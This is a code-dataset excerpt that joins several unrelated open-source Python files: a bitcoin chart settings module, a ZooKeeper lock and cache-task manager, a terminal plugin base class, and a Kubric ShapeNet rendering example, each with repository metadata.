logger.debug("Result of %s: \n %s" % (dirpath, pprint.pformat(formattedResult)))
return formattedResult
|
bukosabino/btctrading
|
settings.py
|
Python
|
mit
| 422
| 0.004739
|
from datetime import date
NTESTS = 1
PREV_DAYS = 10
PERCENT_UP = 0.01
PERCEN
|
T_DOWN = 0.01
PERIOD = 'Hourly' # [5-min, 15-min, 30-min, Hourly, 2-hour, 6-hour, 12-hour, Daily, Weekly]
MARKET = 'bitstampUSD'
# DATE START
YEAR_START = 2011
MONTH_START = 9
DAY_START = 13
DATE_START = date(YEAR_START, MONTH_START, DAY_START)
# DATE END
DATE_END = date
|
.today()
URL_DATA_BASE = 'http://bitcoincharts.com/charts/chart.json?'
|
yandex/mastermind
|
src/cocaine-app/sync/kazoo_impl/__init__.py
|
Python
|
gpl-2.0
| 8,087
| 0.002844
|
from contextlib import contextmanager
import logging
import os.path
import traceback
from kazoo.client import KazooClient
from kazoo.exceptions import (
LockTimeout,
NodeExistsError,
NoNodeError,
KazooException,
ZookeeperError,
)
from kazoo.retry import KazooRetry, RetryFailedError
from mastermind.utils.queue import LockingQueue
from mastermind_core import helpers
import msgpack
# from errors import ConnectionError, InvalidDataError
from lock import Lock
from sync.error import LockError, LockFailedError, LockAlreadyAcquiredError, InconsistentLockError
logger = logging.getLogger('mm')
kazoo_logger = logging.getLogger('kazoo')
kazoo_logger.propagate = False
[kazoo_logger.addHandler(h) for h in logger.handlers]
kazoo_logger.setLevel(logging.INFO)
class ZkSyncManager(object):
RETRIES = 2
LOCK_TIMEOUT = 3
def __init__(self, host='127.0.0.1:2181', lock_path_prefix='/mastermind/locks/'):
self.client = KazooClient(host, timeout=3)
logger.info('Connecting to zookeeper host {}, lock_path_prefix: {}'.format(
host, lock_path_prefix))
try:
self.client.start()
except Exception as e:
logger.error(e)
raise
self._retry = KazooRetry(max_tries=self.RETRIES)
self.lock_path_prefix = helpers.encode(lock_path_prefix)
@contextmanager
def lock(self, lockid, blocking=True, timeout=LOCK_TIMEOUT):
lock = Lock(self.client, self.lock_path_prefix + lockid)
try:
acquired = lock.acquire(blocking=blocking, timeout=timeout)
logger.debug('Lock {0} acquired: {1}'.format(lockid, acquired))
if not acquired:
# TODO: Change exception time or set all required parameters for
# this type of exception
raise LockAlreadyAcquiredError(lock_id=lockid)
yield
except LockTimeout:
logger.info('Failed to acquire lock {} due to timeout ({} seconds)'.format(
lockid, timeout))
raise LockFailedError(lock_id=lockid)
except LockAlreadyAcquiredError:
raise
except LockError as e:
logger.error('Failed to acquire lock {0}: {1}\n{2}'.format(
lockid, e, traceback.format_exc()))
raise
finally:
lock.release()
def persistent_locks_acquire(self, locks, data=''):
try:
retry = self._retry.copy()
result = retry(self._inner_persistent_locks_acquire, locks=locks, data=data)
except RetryFailedError:
raise LockError('Failed to acquire persistent locks {} after several retries'.format(
locks))
except KazooException as e:
logger.error('Failed to fetch persistent locks {0}: {1}\n{2}'.format(
locks, e, traceback.format_exc()))
raise LockError
return result
def _inner_persistent_locks_acquire(self, locks, data):
ensured_paths = set()
tr = self.client.transaction()
for lockid in locks:
path = self.lock_path_prefix + lockid
parts = path.rsplit('/', 1)
if len(parts) == 2 and parts[0] not in ensured_paths:
self.client.ensure_path(parts[0])
ensured_paths.add(parts[0])
tr.create(path, data)
failed = False
fail
|
ed_locks = []
result = tr.commit()
for i, res in
|
enumerate(result):
if isinstance(res, ZookeeperError):
failed = True
if isinstance(res, NodeExistsError):
failed_locks.append(locks[i])
if failed_locks:
holders = []
for f in failed_locks:
# TODO: fetch all holders with 1 transaction request
holders.append((f, self.client.get(self.lock_path_prefix + f)))
foreign_holders = [(l, h) for l, h in holders if h[0] != data]
failed_lock, holder_resp = foreign_holders and foreign_holders[0] or holders[0]
holder = holder_resp[0]
holders_ids = list(set(h[0] for _, h in holders))
logger.warn('Persistent lock {0} is already set by {1}'.format(failed_lock, holder))
raise LockAlreadyAcquiredError(
'Lock for {0} is already acquired by job {1}'.format(failed_lock, holder),
lock_id=failed_lock, holder_id=holder,
lock_ids=failed_locks, holders_ids=holders_ids)
elif failed:
logger.error('Failed to set persistent locks {0}, result: {1}'.format(
locks, result))
raise LockError
return True
def get_children_locks(self, lock_prefix):
try:
retry = self._retry.copy()
result = retry(self.__inner_get_children_locks, lock_prefix)
except RetryFailedError:
raise LockError('Failed to get fetch children locks for {}'.format(
lock_prefix))
return result
def __inner_get_children_locks(self, lock_prefix):
full_path = self.lock_path_prefix + lock_prefix
self.client.ensure_path(os.path.normpath(full_path))
result = self.client.get_children(full_path)
return ['{0}{1}'.format(lock_prefix, lock) for lock in result]
def persistent_locks_release(self, locks, check=''):
try:
retry = self._retry.copy()
result = retry(self.__inner_persistent_locks_release, locks=locks, check=check)
except RetryFailedError:
raise LockError(
'Failed to release persistent locks {} after several retries'.format(locks)
)
except KazooException as e:
logger.error('Failed to remove persistent locks {0}: {1}\n{2}'.format(
locks, e, traceback.format_exc()))
raise LockError
return result
def __inner_persistent_locks_release(self, locks, check):
for lockid in locks:
try:
if check:
data = self.client.get(self.lock_path_prefix + lockid)
if data[0] != check:
logger.error(
'Lock {lock_id} has inconsistent data: {current_data}, '
'expected {expected_data}'.format(
lock_id=lockid,
current_data=data[0],
expected_data=check,
)
)
raise InconsistentLockError(lock_id=lockid, holder_id=data[0])
self.client.delete(self.lock_path_prefix + lockid)
except NoNodeError:
logger.warn('Persistent lock {0} is already removed'.format(lockid))
pass
return True
class ZkCacheTaskManager(object):
RETRIES = 2
def __init__(self, host='127.0.0.1:2181', lock_path_prefix='/mastermind/cache/'):
self.client = KazooClient(host, timeout=3)
logger.info('Connecting to zookeeper host {}, lock_path_prefix: {}'.format(
host, lock_path_prefix))
try:
self.client.start()
except Exception as e:
logger.error(e)
raise
self.lock_path_prefix = helpers.encode(lock_path_prefix)
def put_task(self, task):
group_id = task['group']
q = LockingQueue(self.client, self.lock_path_prefix, group_id)
return q.put(self._serialize(task))
def put_all(self, tasks):
for task in tasks:
self.put_task(task)
def list(self):
for group_id in self.client.retry(self.client.get_children, self.lock_path_prefix):
for item in LockingQueue(self.client, self.lock_path_prefix, group_id).list():
yield self._unserialize(item)
@staticmethod
def _serialize(task):
return msgpack.packb(task)
@staticmethod
def _unserialize(task):
return msgpack.unpackb(task)
|
Bakterija/mmplayer
|
mmplayer/kivy_soil/terminal_widget/plugins/_base.py
|
Python
|
mit
| 4,885
| 0
|
class PluginBase(object):
name = ''
doc = 'doc about this class'
methods_subclass = {}
def __init__(self, **kwargs):
self.methods = {
'help': 'doc about help method',
'get_methods': 'doc about get_methods method'
}
self.methods.update(self.methods_subclass)
def on_import(self, term_system):
pass
def get_methods(self):
return [key for key in self.methods]
def help(self, method_name):
doc = self.methods.get(method_name[0], None)
if doc:
ret = doc
else:
ret = '# %s: %s: %s not found' % (
self.name, 'help', method_name)
return ret
@staticmethod
def get_args_kwargs_from_text(text):
start_str = (None, -1)
strings_found = []
kwargs_found = {}
args_found = []
for i, char in enumerate(text):
if char in ("'", '"'):
if start_str[0]:
if char == start_str[0]:
rev = text[:i+1][::-1]
b = rev[i+1 - start_str[1]:].find(' ')
if b != -1:
strings_found.append((start_str[1] - b, i+1))
else:
strings_found.append((start_str[1], i+1))
start_str = (None, -1)
else:
start_str = (char, i)
if strings_found:
last_end = 0
for start, end in strings_found:
before = text[last_end:start]
for x in before.split(' '):
if x:
args_found.append(x)
args_found.append(text[start:end])
last_end = end
for x in text[end:].split(' '):
if x:
args_found.append(x)
else:
args_found = text.split(' ')
remlist = []
for i, x in enumerate(args_found):
a = x.find('=')
if a != -1:
yes = False
c = x.find("'")
b = x.find('"')
|
if b == -1 and c == -1:
yes = True
else:
start = b
if c != -1 and c < b:
start = c
a = x[:start].find('=')
if a !=
|
-1:
yes = True
if yes:
kwargs_found[x[:a]] = x[a+1:]
remlist.append(i)
for x in reversed(remlist):
del args_found[x]
return args_found, kwargs_found
@staticmethod
def get_from_locals_globals(term_system, text):
ret = term_system.exec_locals.get(text, None)
if not ret:
ret = term_system.get_globals().get(text, None)
return ret
@staticmethod
def slice_fname(text):
fname = ''
text2 = ''
args = ''
if text:
b = text.find(' ')
if b != -1:
text2 = text[b+1:]
fname = text[:b]
else:
fname = text
return fname, text2
@staticmethod
def get_method_args(text):
fname = ''
method = ''
args = []
if text:
aspl = text.split(' ')
fname = aspl[0]
if len(aspl) > 1:
method = aspl[1]
if len(aspl) > 2:
args = aspl[2:]
return fname, method, tuple(args)
@staticmethod
def get_method_args_kwargs(text):
fname, method, args, kwargs = '', '', [], {}
if text:
aspl = text.split(' ')
fname = aspl[0]
if len(aspl) > 1:
method = aspl[1]
if len(aspl) > 2:
args, kwargs = PluginBase.get_args_kwargs_from_text(
' '.join(aspl[2:]))
return fname, method, tuple(args), kwargs
def handle_input(self, term_system, term_globals, exec_locals, text):
fname, method, args, kwargs = self.get_method_args_kwargs(text)
found = False
if method in self.methods:
m = getattr(self, method, None)
if m:
found = True
if args and kwargs:
result = m(*args, **kwargs)
elif args:
result = m(*args)
elif kwargs:
result = m(**kwargs)
else:
result = m()
if not found:
result = (
'# %s: Method "%s" not found\n'
'# Available methods are %s\n'
'# Type "help [method_name]" for help') % (
self.name, method, self.get_methods())
return result
|
google-research/kubric
|
examples/shapenet.py
|
Python
|
apache-2.0
| 3,800
| 0.002368
|
# Copyright 2022 The Kubric Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import numpy as np
import kubric as kb
from kubric.renderer import Blender
# TODO: go to https://shapenet.org/ create an account and agree to the terms
# then find the URL for the kubric preprocessed ShapeNet and put it here:
SHAPENET_PATH = "gs://KUBRIC_SHAPENET_PATH/ShapeNetCore.v2.json"
if SHAPENET_PATH == "gs://KUBRIC_SHAPENET_PATH/ShapeNetCore.v2.json":
raise ValueError("Wrong ShapeNet path. Please visit https://shapenet.org/ "
"agree to terms and conditions, and find the
|
correct path.")
# --- CLI arguments
parser = kb.ArgumentParser()
parser.set_defaults(
frame_end=5,
resolution=(512, 512),
)
FLAGS = parser.parse_args()
# --- Common setups & resources
scene, rng, output_dir, scratch_dir = kb.setup(FLAGS)
renderer = Blender(scene, scratch_dir,
samples_per_pixel=64,
background_transparency=True)
shapenet = kb.AssetSource.from_manifest(SHAPENET_PATH)
# --- Add Kl
|
evr-like lights to the scene
scene += kb.assets.utils.get_clevr_lights(rng=rng)
scene.ambient_illumination = kb.Color(0.05, 0.05, 0.05)
# --- Add shadow-catcher floor
floor = kb.Cube(name="floor", scale=(100, 100, 1), position=(0, 0, -1))
scene += floor
# Make the floor transparent except for catching shadows
# Together with background_transparency=True (above) this results in
# the background being transparent except for the object shadows.
floor.linked_objects[renderer].cycles.is_shadow_catcher = True
# --- Keyframe the camera
scene.camera = kb.PerspectiveCamera()
for frame in range(FLAGS.frame_start, FLAGS.frame_end + 1):
scene.camera.position = kb.sample_point_in_half_sphere_shell(1.5, 1.7, 0.1)
scene.camera.look_at((0, 0, 0))
scene.camera.keyframe_insert("position", frame)
scene.camera.keyframe_insert("quaternion", frame)
# --- Fetch a random (airplane) asset
airplane_ids = [name for name, spec in shapenet._assets.items()
if spec["metadata"]["category"] == "airplane"]
asset_id = rng.choice(airplane_ids) #< e.g. 02691156_10155655850468db78d106ce0a280f87
obj = shapenet.create(asset_id=asset_id)
logging.info(f"selected '{asset_id}'")
# --- make object flat on X/Y and not penetrate floor
obj.quaternion = kb.Quaternion(axis=[1, 0, 0], degrees=90)
obj.position = obj.position - (0, 0, obj.aabbox[0][2])
scene.add(obj)
# --- Rendering
logging.info("Rendering the scene ...")
renderer.save_state(output_dir / "scene.blend")
data_stack = renderer.render()
# --- Postprocessing
kb.compute_visibility(data_stack["segmentation"], scene.assets)
data_stack["segmentation"] = kb.adjust_segmentation_idxs(
data_stack["segmentation"],
scene.assets,
[obj]).astype(np.uint8)
kb.file_io.write_rgba_batch(data_stack["rgba"], output_dir)
kb.file_io.write_depth_batch(data_stack["depth"], output_dir)
kb.file_io.write_segmentation_batch(data_stack["segmentation"], output_dir)
# --- Collect metadata
logging.info("Collecting and storing metadata for each object.")
data = {
"metadata": kb.get_scene_metadata(scene),
"camera": kb.get_camera_info(scene.camera),
"object": kb.get_instance_info(scene, [obj])
}
kb.file_io.write_json(filename=output_dir / "metadata.json", data=data)
kb.done()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.